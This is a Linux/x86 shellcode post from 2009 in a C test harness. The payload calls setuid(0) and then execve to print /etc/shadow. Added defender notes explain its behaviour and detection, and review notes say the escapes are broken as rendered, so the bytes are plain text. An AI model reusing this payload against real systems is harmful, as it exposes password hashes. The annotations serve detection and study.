
# Title : Linux - setuid(0) and cat /etc/shadow
# Published : 2009-12-04
# Author : ka0x


#include <stdio.h>

/* 
	linux/x86 ; setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
	written by ka0x - <ka0x01[alt+64]gmail.com>
	lun sep 21 16:40:16 CEST 2009

	greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others!
*/

/*
 * Test harness for the 49-byte Linux/x86 payload described in the header
 * comment (32-bit, int 0x80 system-call convention).
 *
 * What the payload does, following the annotated instructions below:
 *   1. eax = 0x17, ebx = 0, int 0x80   -> setuid(0)
 *   2. eax = 0x0b, ebx -> "/bin/cat",
 *      ecx -> { "/bin/cat", "/etc//shadow", NULL }, edx = NULL,
 *      int 0x80                        -> execve()
 *
 * Defender notes:
 *   - setuid(0) only succeeds when the calling process already holds the
 *     privilege to change its UID (root or CAP_SETUID, e.g. inside a
 *     setuid-root binary). The payload is a post-exploitation stage, not a
 *     privilege escalation by itself. Its result is never checked: eax is
 *     overwritten by the following lea.
 *   - The observable behaviour is a setuid call immediately followed by an
 *     execve of /bin/cat with the shadow file as argument. Auditing execve
 *     arguments and reads of /etc/shadow by unexpected processes covers it.
 *   - The path is spelled "/etc//shadow" (doubled slash) so that it fills
 *     whole dwords; match on the normalized path, not the literal string.
 *   - Nothing follows the final int 0x80, so if execve fails, execution
 *     continues into whatever bytes come next in memory.
 *
 * NOTE(review): as rendered on this page the backslash of every hex escape
 * and of the newline escapes has been lost, so the literals below are plain
 * ASCII text rather than the byte sequence the comments describe, and the
 * printed size would not be 49.
 */
int main()
{
	/* Automatic (stack) array holding the payload bytes plus a trailing NUL. */
	char shellcode[] = 
			"x31xdb"		// xor ebx,ebx        ; ebx = 0, the uid argument
			"x6ax17"		// push byte 17h      ; 0x17 = setuid syscall number
			"x58"			// pop eax            ; eax = 0x17
			"xcdx80"		// int 0x80           ; setuid(0)
			"x8dx43x0b"		// lea eax,[ebx+0xb]  ; eax = 0x0b (execve), ebx is still 0
			"x99"			// cdq                ; edx = 0 (sign-extension of eax)
			"x52"			// push edx           ; NUL terminator for the program path
			"x68x2fx63x61x74"	// push dword 0x7461632f ; "/cat"
			"x68x2fx62x69x6e"	// push dword 0x6e69622f ; "/bin"
			"x89xe3"		// mov ebx,esp        ; ebx -> "/bin/cat"
			"x52"			// push edx           ; NUL terminator for the file argument
			"x68x61x64x6fx77"	// push dword 0x776f6461 ; "adow"
			"x68x2fx2fx73x68"	// push dword 0x68732f2f ; "//sh"
			"x68x2fx65x74x63"	// push dword 0x6374652f ; "/etc"
			"x89xe1"		// mov ecx,esp        ; ecx -> "/etc//shadow"
			"x52"			// push edx           ; argv[2] = NULL
			"x51"			// push ecx           ; argv[1] = "/etc//shadow"
			"x53"			// push ebx           ; argv[0] = "/bin/cat"
			"x89xe1"		// mov ecx,esp        ; ecx -> argv
			"xcdx80" ;		// int 80h            ; execve(ebx, ecx, edx = NULL envp)

	/*
	 * Prints the payload length, excluding the array's trailing NUL.
	 * NOTE(review): sizeof yields a size_t, so "%d" is a format/argument
	 * mismatch; "%zu" is the matching conversion. The trailing "nn" is
	 * presumably two newline escapes that lost their backslashes.
	 */
	printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
	/*
	 * Casts the array's address to a function pointer and calls it. The array
	 * lives on the stack, so on a system that enforces a non-executable stack
	 * this call faults instead of running the bytes.
	 */
	(*(void(*)()) shellcode)();
	
	/* Not reached when the execve above succeeds, since the process image is replaced. */
	return 0;
}